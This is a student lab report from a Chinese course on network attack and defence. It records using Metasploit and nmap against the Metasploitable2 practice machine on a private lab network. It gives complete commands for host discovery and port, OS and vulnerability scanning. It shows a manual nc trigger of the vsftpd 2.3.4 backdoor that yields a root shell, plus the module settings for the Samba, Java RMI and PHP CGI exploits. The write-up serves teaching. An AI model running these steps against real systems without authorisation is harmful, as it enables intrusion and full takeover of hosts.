首页 > 其他分享 >20222422 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222422 2024-2025-1 《网络与系统攻防技术》实验六实验报告

时间:2024-11-18 20:22:46浏览次数:1  
标签:漏洞 nmap 端口 192.168 198.149 2024 2025 20222422 靶机

一、实验内容

本实践目标是掌握metasploit的用法。

指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成下面实验内容。
用户名密码均为:msfadmin

(1)前期渗透

①主机发现(可用Aux中的arp_sweep,search一下就可以use)。
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。

(2)Vsftpd源码包后门漏洞(21端口)
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
(4)Java RMI SERVER命令执行漏洞(1099端口)
(5)PHP CGI参数执行注入漏洞(80端口)

二、实验过程

(1)前期渗透

攻击机:192.168.198.131(kali)
靶机:192.168.198.149(目标靶机Metasploitable2)

①主机发现(使用Aux中的arp_sweep)

(a)进入kali,使用msfconsole
image

(b)搜索arp_sweep模块,并使用相关模块
search arp_sweep
use 0
image

(c)显示模块需要配置的选项
show options
image

(d)设置需要配置的选项
set RHOSTS 192.168.198.131/24
set THREADS 30

(e)执行该模块
exploit
image

从返回结果可以看到,arp_sweep模块很快发现了192.168.198.0/24网段上拥有如上图活跃主机,其中192.168.198.149这个IP地址为目标靶机IP地址。

②端口扫描:直接用nmap

nmap 192.168.198.149
image

③扫描系统版本、漏洞等

(a)扫描操作系统:
nmap -O 192.168.198.149
image

发现操作系统版本为:linux_kernel:2.6

(b)扫描漏洞:

nmap漏洞扫描分类:
auth:负责处理鉴权证书(绕开鉴权)的脚本;
broadcast:在局域网内探查更多服务开启状况,如dhcp、dns、sqlserver等服务;
brute:提供暴力破解方式,针对常见的应用,如http、snmp等;
default:使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力;
discovery:对网络进行更多的信息,如SMB枚举、SNMP查询等;
dos:用于进行拒绝服务攻击;
exploit:利用已知的漏洞入侵系统;
external:利用第三言的数据库或资源,例如进行whois解析;
fuzzer:模糊测试的脚本,发送异常的包到目标机,探测出潜在的漏洞;
intrusive:入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽;
malware:探测目标机是否感染了病毒、开启了后门等信息;
safe:此类与intrusive相反,属于安全性脚本;
version:负责增强服务与版本扫描(Version Detection)功能的脚本;
vuln:负责检查目录机是否有常见的漏洞(Vulnerability),如是否有MS08_067;

使用指令:
nmap --script=xxx 192.168.198.149 其中xxx为上述分类中的单词

例如:探测目标机是否感染了病毒、开启了后门等信息
nmap --script=malware 192.168.198.149
image

发现ftp端口有后门漏洞

(2)Vsftpd源码包后门漏洞(21端口)

攻击机:192.168.198.131(kali)
靶机:192.168.198.149(目标靶机Metasploitable2)

(a)测试kali与靶机的连通性:
image

image

(b)在kali 终端下对靶机ip地址进行扫描,查看端口情况
nmap 192.168.198.149
image

发现21号端口是开放的

(c)继续扫描该端口版本
nmap -p 21 192.168.198.149 -sV
image

发现是含有笑脸漏洞的vsftpd版本

(d)查看6200端口情况
nmap -p 6200 192.168.198.149
image

发现是关闭的

(e)连接21端口并通过笑脸漏洞登录
nc 192.168.198.149 21

user 任意用户名(以“:)”结尾即可)这里用的是:tky:)

pass 任意密码这里用的是:20222422
image

(f)重新打开一个终端,查看6200端口情况
nmap -p 6200 192.168.198.149
image

发现已经打开

(g)获取shell
nc 192.168.198.149 6200
image

发现成功获取shell,可以使用ls,ifconfig等指令

输入whoami
image

发现是root权限

(h)用msfconsole利用漏洞
利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞),使用模块
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
image

进行设置:
image

执行结果如下:
image

发现成功获取shell

(3)SambaMS-RPC Shell命令注入漏洞(端口139)

攻击机:192.168.198.131(kali)
靶机:192.168.198.149(目标靶机Metasploitable2)

(a)启动metasploit
msfconsole

image

(b)选择漏洞库
search samba
use exploit/multi/samba/usermap_script

image

(c)设置参数
show options
set RHOST 192.168.198.149

image

(d)开始攻击
exploit

image

成功控制shell

(4)Java RMI SERVER命令执行漏洞(1099端口)

攻击机:192.168.198.131(kali)
靶机:192.168.198.149(目标靶机Metasploitable2)

(a)查看1099端口是否开启
Nmap –p 0-65535 192.168.198.149

image

发现1099端口开启

(b)启动metasploit
msfconsole

image

(c)选择漏洞库
search rmi
use exploit/multi/misc/java_rmi_server

image

(d)设置参数
show options
set RHOST 192.168.198.149

image

(e)开始攻击
exploit

image

成功控制shell

(5)PHP CGI参数执行注入漏洞(80端口)

(a)启动metasploit
msfconsole

image

(b)选择漏洞库
use exploit/multi/http/php_cgi_arg_injection

image

(c)设置参数
show options
set RHOST 192.168.198.149

image

(d)开始攻击
exploit

image

成功控制shell

三、问题及解决方案

问题一:在Vsftpd源码包后门漏洞(21端口),连接21端口并通过笑脸漏洞登录时取名“tky:)”的时候使用中文的“:”,导致不成功。
问题一解决方案:更改英文输入法再输入冒号。

问题二:使用nmap -p 6200 192.168.198.149等扫描指令后发现无法执行。
问题二解决方案:发现是“-”这个符号出了问题,将“-p”重新输入一遍解决。

四、学习感悟、思考等

在本次渗透测试实验中,我深入学习并实践了如何利用Metasploit框架进行漏洞的发现和利用。实验的主要目标是通过对Metasploitable 2靶机的渗透,掌握常见漏洞的利用方式以及相关工具的使用。首先,我通过Metasploit的nmap模块对靶机进行端口扫描,识别出开放的端口和运行的服务。接下来,通过对这些服务的分析,我确定了几个潜在的漏洞,分别针对Vsftpd后门漏洞、Samba MS-RPC漏洞、Java RMI Server漏洞和PHP CGI参数执行漏洞进行了进一步的研究。
通过这次实验,我不仅提高了对Metasploit框架的使用技巧,还加深了对常见漏洞的理解与利用方法,明确了渗透测试的流程和各个环节的重要性。实验让我意识到,网络安全防护不应仅仅依赖外部防御措施,系统设计、配置和编码安全也是防止漏洞的关键。同时,实验过程中也暴露了我在漏洞分析和工具使用上的一些不足,提示我在今后的学习中需要更加注重漏洞原理的深度学习和实践操作的提高。

标签:漏洞,nmap,端口,192.168,198.149,2024,2025,20222422,靶机
From: https://www.cnblogs.com/20222422tky/p/18547542

相关文章

  • 20222420 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    202224202024-2025-1《网络与系统攻防技术》实验六实验报告1.实验内容(1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use)②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等③选做:也可以扫系统版本、漏洞等。(2)Vsftpd源码包后门漏洞(21端口)漏洞原理:在特......
  • 【Project 2024软件下载与安装教程-亲测好用】
    ‌Project2024的操作系统要求是Windows10及以上版本‌。这意味着用户需要在Windows10或更高版本的操作系统上安装和使用Project2024‌1。Project2024是由Microsoft开发的一款高效实用的项目管理工具,旨在帮助项目经理发展计划、为任务分配资源、跟踪进度、管理预算和分析工作......
  • 2025 Lightroom(Lr)安装包下载百度云资源分享
    如大家所熟悉的,LR是AdobeLightroom的简称。相较于PS,LR在图片处理方面更加专业且更受摄影人士、专业影楼所待见。Lightroom是一种非破坏性编辑软件,可将原始图像与任何程序内编辑分开,并将编辑后的图像另存为新文件。Lightroom的编辑功能包括白平衡、存在感、色调、色调曲线、HS......
  • 【Visio 2024软件下载与安装教程-亲测好用】
    MicrosoftVisio2024专业版是一款专业的专业矢量绘图软件。Visio2024不但新增了许多功能,而且还优化了众多性能,比如用户界面优化、更多图形元素库、允许用户邀请其他人一起编辑和查看图表、过程自动化等等,其一系列的改动旨在给予用户们最直观、最便利的操作体验!操作系统‌:Visio......
  • 2024年11月17日 星期天 Go语言基础
    今日格言坚持每天进步一点点~一个人也可以是一个团队~学习全栈开发,做自己喜欢的产品~~Go语言的创始人Go语言的创始人有三位,分别是:RobertGriesemer:他参与开发了JavaHotSpot虚拟机。RobPike:他是Go语言项目的总负责人,曾是贝尔实验室Unix团队的成员,参与过Plan9、Inf......
  • # 20222309 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容本实践目标是掌握metasploit的用法。指导书参考Rapid7官网的指导教程。https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/下载官方靶机Metasploitable2,完成下面实验内容。(1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use)......
  • 2024-2025, 四大翻译工具加AI翻译的深度对比
    前言在过去两年中,人工智能技术的迅猛发展对翻译工具产生了深远的影响。本期特意挑选了四款翻译工具以及一个AI翻译工具,对其性能进行评测,看看在AI技术的加持下,它们的质量提升如何。以下是参赛选手的简介:谷歌翻译谷歌翻译自2006年推出以来,一直是全球最受欢迎的翻译工具,稳居翻......
  • 2024年最值得关注的13款项目管理软件推荐
    2024年最值得关注的13款项目管理软件推荐随着团队协作的日益复杂,项目管理软件成为各类组织不可或缺的工具。无论是软件开发、市场营销,还是跨部门的大型项目管理,都能从中受益。2024年,项目管理工具不断更新和升级,提供了更多样化和专业化的功能。在这一年里,有不少项目管理软件凭借其......
  • 202222313 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容1.1实验要求(1)掌握metasploit、nmap的用法。(2)学习前期渗透的方法。(3)利用4个漏洞,实现对靶机的攻击。1.2学习内容(1)metasploit的用法:可以简单总结为“Search-Use-Show-Set-Exploit/run”。(2)四种漏洞的原理。Vsftpd源码包后门漏洞:在特定版本的vsftpd......
  • 20222418 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容本实践目标是掌握metasploit的用法。指导书参考Rapid7官网的指导教程。https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/下载官方靶机Metasploitable2,完成下面实验内容。(1)前期渗透跳转到的地方①主机发现(可用Aux中的arp_sweep,search一......